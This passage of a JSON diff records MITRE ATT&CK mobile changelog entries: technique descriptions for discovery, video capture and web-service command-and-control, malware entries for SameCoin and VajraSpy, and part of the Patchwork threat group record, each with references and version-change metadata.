+                            "phase_name": "discovery"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1426",
+                            "external_id": "T1426"
+                        },
+                        {
+                            "source_name": "Android-Build",
+                            "description": "Android. (n.d.). Build. Retrieved December 21, 2016.",
+                            "url": "https://developer.android.com/reference/android/os/Build"
+                        },
+                        {
+                            "source_name": "NIST Mobile Threat Catalogue",
+                            "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-12.html",
+                            "external_id": "APP-12"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android",
+                        "iOS"
+                    ],
+                    "x_mitre_tactic_type": [
+                        "Post-Adversary Device Access"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.722000+00:00\", \"old_value\": \"2025-10-24 17:49:31.141000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0601: Detection of System Information Discovery"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-10-25 14:48:32.740000+00:00",
+                    "modified": "2026-05-12 15:12:00.717000+00:00",
+                    "name": "System Network Configuration Discovery",
+                    "description": "Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of devices they access or through information discovery of remote systems. \n\nAdversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1422) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. \n\nOn Android, details of onboard network interfaces are accessible to apps through the `java.net.NetworkInterface` class.(Citation: NetworkInterface) Previously, the Android `TelephonyManager` class could be used to gather telephony-related device identifiers, information such as the IMSI, IMEI, and phone number. However, starting with Android 10, only preloaded, carrier, the default SMS, or device and profile owner applications can access the telephony-related device identifiers.(Citation: TelephonyManager) \n\n \n\nOn iOS, gathering network configuration information is not possible without root access. \n\n \n\nAdversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1422) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "discovery"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1422",
+                            "external_id": "T1422"
+                        },
+                        {
+                            "source_name": "NetworkInterface",
+                            "description": "Android. (n.d.). NetworkInterface. Retrieved December 21, 2016.",
+                            "url": "https://developer.android.com/reference/java/net/NetworkInterface.html"
+                        },
+                        {
+                            "source_name": "TelephonyManager",
+                            "description": "Android. (n.d.). TelephonyManager. Retrieved December 21, 2016.",
+                            "url": "https://developer.android.com/reference/android/telephony/TelephonyManager.html"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android",
+                        "iOS"
+                    ],
+                    "x_mitre_tactic_type": [
+                        "Post-Adversary Device Access"
+                    ],
+                    "x_mitre_version": "2.4",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.717000+00:00\", \"old_value\": \"2025-10-24 17:49:26.973000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "2.4",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1006: Use Recent OS Version"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0634: Detection of System Network Configuration Discovery"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--be63612f-a48f-44f2-a7a6-1763509fcf80",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2024-02-21 20:44:44.404000+00:00",
+                    "modified": "2026-05-12 15:12:00.713000+00:00",
+                    "name": "Wi-Fi Discovery",
+                    "description": "Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Discovery](https://attack.mitre.org/tactics/TA0032) or [Credential Access](https://attack.mitre.org/tactics/TA0031) activity to support both ongoing and future campaigns. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "discovery"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1422/002",
+                            "external_id": "T1422.002"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android",
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.713000+00:00\", \"old_value\": \"2024-02-21 20:44:44.404000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1006: Use Recent OS Version"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0709: Detection of Wi-Fi Discovery"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-08-09 16:14:58.254000+00:00",
+                    "modified": "2026-05-12 15:12:00.721000+00:00",
+                    "name": "Video Capture",
+                    "description": "An adversary can leverage a device\u2019s cameras to gather information by capturing video recordings. Images may also be captured, potentially in specified intervals, in lieu of video files.  \n\n \n\nMalware or scripts may interact with the device cameras through an available API provided by the operating system. Video or image files may be written to disk and exfiltrated later. This technique differs from [Screen Capture](https://attack.mitre.org/techniques/T1513) due to use of the device\u2019s cameras for video recording rather than capturing the victim\u2019s screen. \n\n \n\nIn Android, an application must hold the `android.permission.CAMERA` permission to access the cameras. In iOS, applications must include the `NSCameraUsageDescription` key in the `Info.plist` file. In both cases, the user must grant permission to the requesting application to use the camera. If the device has been rooted or jailbroken, an adversary may be able to access the camera without knowledge of the user.  ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "collection"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1512",
+                            "external_id": "T1512"
+                        },
+                        {
+                            "source_name": "NIST Mobile Threat Catalogue",
+                            "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-19.html",
+                            "external_id": "APP-19"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android",
+                        "iOS"
+                    ],
+                    "x_mitre_tactic_type": [
+                        "Post-Adversary Device Access"
+                    ],
+                    "x_mitre_version": "2.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.721000+00:00\", \"old_value\": \"2025-10-24 17:49:28.248000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "2.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1006: Use Recent OS Version"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0695: Detection of Video Capture"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--939808a7-121d-467a-b028-4441ee8b7cee",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2022-04-06 15:47:06.071000+00:00",
+                    "modified": "2026-05-12 15:12:00.706000+00:00",
+                    "name": "Bidirectional Communication",
+                    "description": "Adversaries may use an existing, legitimate external Web service channel as a means for sending commands to and receiving output from a compromised system. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those commands back over that Web service channel. The return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to development project, updating a document hosted on a Web service, or by sending a Tweet. \n\n \n\nPopular websites and social media, acting as a mechanism for C2, may give a significant amount of cover. This is due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-mobile-attack",
+                            "phase_name": "command-and-control"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1481/002",
+                            "external_id": "T1481.002"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android",
+                        "iOS"
+                    ],
+                    "x_mitre_tactic_type": [
+                        "Post-Adversary Device Access"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.706000+00:00\", \"old_value\": \"2025-10-24 17:49:06.929000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0700: Detection of Bidirectional Communication"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                }
+            ],
+            "revocations": [],
+            "deprecations": [],
+            "deletions": []
+        },
+        "software": {
+            "additions": [],
+            "major_version_changes": [],
+            "minor_version_changes": [],
+            "other_version_changes": [],
+            "patches": [
+                {
+                    "type": "malware",
+                    "id": "malware--4e164a21-3fbe-4aaa-be69-2513fdba90f7",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-20 13:01:30.316000+00:00",
+                    "modified": "2026-05-12 15:12:00.733000+00:00",
+                    "name": "SameCoin",
+                    "description": "[SameCoin](https://attack.mitre.org/software/S9030) is a multi-platform wiper with Windows and Android versions that has been used by [WIRTE](https://attack.mitre.org/groups/G0090) to target entities in the Middle East including in Israel.(Citation: Check Point Wirte NOV 2024)",
+                    "revoked": false,
+                    "labels": [
+                        "malware"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S9030",
+                            "external_id": "S9030"
+                        },
+                        {
+                            "source_name": "Check Point Wirte NOV 2024",
+                            "description": "Check Point. (2024, November 12). Hamas-affiliated Threat Actor WIRTE Continues its Middle East Operations and Moves to Disruptive Activity. Retrieved April 20, 2026.",
+                            "url": "https://research.checkpoint.com/2024/hamas-affiliated-threat-actor-expands-to-disruptive-activity/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "SameCoin"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack",
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows",
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.733000+00:00\", \"old_value\": \"2026-04-22 00:47:27.191000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "malware",
+                    "id": "malware--8205a875-3ed5-4be2-ab9b-14a7d29431d0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-03-09 14:58:08.050000+00:00",
+                    "modified": "2026-05-12 15:12:00.736000+00:00",
+                    "name": "VajraSpy",
+                    "description": "[VajraSpy](https://attack.mitre.org/software/S9006) is Android malware distributed via trojanized messaging and news applications. It has been used to target individuals in Pakistan and India since at least 2021 and has been delivered through the Google Play Store, malicious domains, and other uncontrolled distribution channels. [VajraSpy](https://attack.mitre.org/software/S9006) is attributed with high confidence to [Patchwork](https://attack.mitre.org/groups/G0040) which has used the malware to conduct targeted espionage, primarily against devices in Pakistan.(Citation: ESET_VajraSpy_Feb2024)(Citation: ArcticWolf_DroppingElephant_July2025)(Citation: K7Dhanalakshmi_VajraSpy_April2022) ",
+                    "revoked": false,
+                    "labels": [
+                        "malware"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S9006",
+                            "external_id": "S9006"
+                        },
+                        {
+                            "source_name": "ArcticWolf_DroppingElephant_July2025",
+                            "description": "ArcticWolf. (2025, July 23). Dropping Elephant APT Group Targets Turkish Defense Industry With New Campaign and Capabilities: LOLBAS, VLC Player, and Encrypted Shellcode. Retrieved November 3, 2025.",
+                            "url": "https://arcticwolf.com/resources/blog/dropping-elephant-apt-group-targets-turkish-defense-industry/"
+                        },
+                        {
+                            "source_name": "K7Dhanalakshmi_VajraSpy_April2022",
+                            "description": "Dhanalakshmi. (2022, April 19).  VajraSpy \u2013 An Android RAT. Retrieved November 5, 2025.",
+                            "url": "https://labs.k7computing.com/index.php/vajraspy-an-android-rat/"
+                        },
+                        {
+                            "source_name": "ESET_VajraSpy_Feb2024",
+                            "description": "Stefanko, L. (2024, February 1). VajraSpy: A Patchwork of espionage apps. Retrieved October 27, 2025.",
+                            "url": "https://www.welivesecurity.com/en/eset-research/vajraspy-patchwork-espionage-apps/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "VajraSpy"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Manikantan Srinivasan, NEC Corporation India",
+                        "Pooja Natarajan, NEC Corporation India",
+                        "Takemasa Kamatani , NEC Corporation"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.736000+00:00\", \"old_value\": \"2026-04-23 01:32:27.375000+00:00\"}, \"root['description']\": {\"new_value\": \"[VajraSpy](https://attack.mitre.org/software/S9006) is Android malware distributed via trojanized messaging and news applications. It has been used to target individuals in Pakistan and India since at least 2021 and has been delivered through the Google Play Store, malicious domains, and other uncontrolled distribution channels. [VajraSpy](https://attack.mitre.org/software/S9006) is attributed with high confidence to [Patchwork](https://attack.mitre.org/groups/G0040) which has used the malware to conduct targeted espionage, primarily against devices in Pakistan.(Citation: ESET_VajraSpy_Feb2024)(Citation: ArcticWolf_DroppingElephant_July2025)(Citation: K7Dhanalakshmi_VajraSpy_April2022) \", \"old_value\": \"[VajraSpy](https://attack.mitre.org/software/S9006) is Android malware distributed via trojanized messaging and news applications. It has been used to target individuals in Pakistan and India since at least 2021 and has been delivered through the Google Play Store, malicious domains, and other uncontrolled distribution channels. [VajraSpy](https://attack.mitre.org/software/S9006) is attributed with high confidence to [Patchwork](https://attack.mitre.org/groups/G0040) which has used the malware to conduct targeted espionage, primarily against devices in Pakistan. (Citation: ESET_VajraSpy_Feb2024)(Citation: ArcticWolf_DroppingElephant_July2025)(Citation: K7Dhanalakshmi_VajraSpy_April2022) \"}}}",
+                    "previous_version": "1.0",
+                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to4__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to4__0\"><a href=\"#difflib_chg_to4__top\">t</a></td><td class=\"diff_header\" id=\"from4_1\">1</td><td nowrap=\"nowrap\">[VajraSpy](https://attack.mitre.org/software/S9006)&nbsp;is&nbsp;Andro</td><td class=\"diff_next\"><a href=\"#difflib_chg_to4__top\">t</a></td><td class=\"diff_header\" id=\"to4_1\">1</td><td nowrap=\"nowrap\">[VajraSpy](https://attack.mitre.org/software/S9006)&nbsp;is&nbsp;Andro</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">id&nbsp;malware&nbsp;distributed&nbsp;via&nbsp;trojanized&nbsp;messaging&nbsp;and&nbsp;news&nbsp;app</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">id&nbsp;malware&nbsp;distributed&nbsp;via&nbsp;trojanized&nbsp;messaging&nbsp;and&nbsp;news&nbsp;app</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">lications.&nbsp;It&nbsp;has&nbsp;been&nbsp;used&nbsp;to&nbsp;target&nbsp;individuals&nbsp;in&nbsp;Pakista</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">lications.&nbsp;It&nbsp;has&nbsp;been&nbsp;used&nbsp;to&nbsp;target&nbsp;individuals&nbsp;in&nbsp;Pakista</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">n&nbsp;and&nbsp;India&nbsp;since&nbsp;at&nbsp;least&nbsp;2021&nbsp;and&nbsp;has&nbsp;been&nbsp;delivered&nbsp;throu</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">n&nbsp;and&nbsp;India&nbsp;since&nbsp;at&nbsp;least&nbsp;2021&nbsp;and&nbsp;has&nbsp;been&nbsp;delivered&nbsp;throu</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">gh&nbsp;the&nbsp;Google&nbsp;Play&nbsp;Store,&nbsp;malicious&nbsp;domains,&nbsp;and&nbsp;other&nbsp;uncon</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">gh&nbsp;the&nbsp;Google&nbsp;Play&nbsp;Store,&nbsp;malicious&nbsp;domains,&nbsp;and&nbsp;other&nbsp;uncon</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">trolled&nbsp;distribution&nbsp;channels.&nbsp;[VajraSpy](https://attack.mit</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">trolled&nbsp;distribution&nbsp;channels.&nbsp;[VajraSpy](https://attack.mit</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">re.org/software/S9006)&nbsp;is&nbsp;attributed&nbsp;with&nbsp;high&nbsp;confidence&nbsp;to</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">re.org/software/S9006)&nbsp;is&nbsp;attributed&nbsp;with&nbsp;high&nbsp;confidence&nbsp;to</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;[Patchwork](https://attack.mitre.org/groups/G0040)&nbsp;which&nbsp;ha</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;[Patchwork](https://attack.mitre.org/groups/G0040)&nbsp;which&nbsp;ha</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s&nbsp;used&nbsp;the&nbsp;malware&nbsp;to&nbsp;conduct&nbsp;targeted&nbsp;espionage,&nbsp;primarily&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s&nbsp;used&nbsp;the&nbsp;malware&nbsp;to&nbsp;conduct&nbsp;targeted&nbsp;espionage,&nbsp;primarily&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">against&nbsp;devices&nbsp;in&nbsp;Pakistan.<span class=\"diff_sub\">&nbsp;</span>(Citation:&nbsp;ESET_VajraSpy_Feb202</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">against&nbsp;devices&nbsp;in&nbsp;Pakistan.(Citation:&nbsp;ESET_VajraSpy_Feb2024</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">4)(Citation:&nbsp;ArcticWolf_DroppingElephant_July2025)(Citation:</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">)(Citation:&nbsp;ArcticWolf_DroppingElephant_July2025)(Citation:&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;K7Dhanalakshmi_VajraSpy_April2022)&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">K7Dhanalakshmi_VajraSpy_April2022)&nbsp;</td></tr>\n        </tbody>\n    </table>"
+                }
+            ],
+            "revocations": [],
+            "deprecations": [],
+            "deletions": []
+        },
+        "groups": {
+            "additions": [],
+            "major_version_changes": [],
+            "minor_version_changes": [
+                {
+                    "type": "intrusion-set",
+                    "id": "intrusion-set--17862c7d-9e60-48a0-b48e-da4dc4c3f6b0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:32:07.145000+00:00",
+                    "modified": "2026-05-12 15:12:00.731000+00:00",
+                    "name": "Patchwork",
+                    "description": "[Patchwork](https://attack.mitre.org/groups/G0040) is a cyber espionage group that was first observed in December 2015. While the group has not been definitively attributed, circumstantial evidence suggests the group may be a pro-Indian or Indian entity. [Patchwork](https://attack.mitre.org/groups/G0040) has been seen targeting industries related to diplomatic and government agencies. Much of the code used by this group was copied and pasted from online forums. [Patchwork](https://attack.mitre.org/groups/G0040) was also seen operating spearphishing campaigns targeting U.S. think tank groups in March and April of 2018.(Citation: Cymmetria Patchwork) (Citation: Symantec Patchwork)(Citation: TrendMicro Patchwork Dec 2017)(Citation: Volexity Patchwork June 2018)",
+                    "aliases": [
+                        "Patchwork",
+                        "Hangover Group",
+                        "Dropping Elephant",
+                        "Chinastrats",
+                        "MONSOON",
+                        "Operation Hangover"
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/groups/G0040",
+                            "external_id": "G0040"
+                        },
+                        {
+                            "source_name": "Patchwork",
+                            "description": "(Citation: Cymmetria Patchwork) (Citation: Symantec Patchwork) (Citation: Securelist Dropping Elephant) (Citation: PaloAlto Patchwork Mar 2018) (Citation: Volexity Patchwork June 2018)"
+                        },
+                        {
+                            "source_name": "Chinastrats",
+                            "description": "(Citation: Securelist Dropping Elephant)"
+                        },
+                        {
+                            "source_name": "Dropping Elephant",
+                            "description": "(Citation: Symantec Patchwork) (Citation: Securelist Dropping Elephant) (Citation: PaloAlto Patchwork Mar 2018) (Citation: Volexity Patchwork June 2018)"
+                        },
+                        {
+                            "source_name": "Hangover Group",
+                            "description": "[Patchwork](https://attack.mitre.org/groups/G0040) and the Hangover Group have both been referenced as aliases for the threat group associated with Operation Monsoon.(Citation: PaloAlto Patchwork Mar 2018)(Citation: Unit 42 BackConfig May 2020)(Citation: Forcepoint Monsoon)"
+                        },
+                        {
+                            "source_name": "Cymmetria Patchwork",
+                            "description": "Cymmetria. (2016). Unveiling Patchwork - The Copy-Paste APT. Retrieved November 17, 2024.",
+                            "url": "https://web.archive.org/web/20180825085952/https:/s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf"
+                        },
+                        {
+                            "source_name": "Operation Hangover May 2013",
+                            "description": "Fagerland, S., et al. (2013, May). Operation Hangover: Unveiling an Indian Cyberattack Infrastructure. Retrieved November 17, 2024.",
+                            "url": "https://web.archive.org/web/20140424084220/http://enterprise-manage.norman.c.bitbit.net/resources/files/Unveiling_an_Indian_Cyberattack_Infrastructure.pdf"
+                        },
+                        {
+                            "source_name": "Symantec Patchwork",
+                            "description": "Hamada, J.. (2016, July 25). Patchwork cyberespionage group expands targets from governments to wide range of industries. Retrieved August 17, 2016.",
+                            "url": "http://www.symantec.com/connect/blogs/patchwork-cyberespionage-group-expands-targets-governments-wide-range-industries"
+                        },
+                        {
+                            "source_name": "Unit 42 BackConfig May 2020",
+                            "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020.",
+                            "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/"
+                        },
+                        {
+                            "source_name": "Operation Hangover",
+                            "description": "It is believed that the actors behind [Patchwork](https://attack.mitre.org/groups/G0040) are the same actors behind Operation Hangover. (Citation: Forcepoint Monsoon) (Citation: Operation Hangover May 2013)"
+                        },
+                        {
+                            "source_name": "Securelist Dropping Elephant",
+                            "description": "Kaspersky Lab's Global Research & Analysis Team. (2016, July 8). The Dropping Elephant \u2013 aggressive cyber-espionage in the Asian region. Retrieved August 3, 2016.",
+                            "url": "https://securelist.com/the-dropping-elephant-actor/75328/"
+                        },
+                        {
+                            "source_name": "PaloAlto Patchwork Mar 2018",
+                            "description": "Levene, B. et al.. (2018, March 7). Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent. Retrieved March 31, 2018.",
+                            "url": "https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/"
+                        },
+                        {
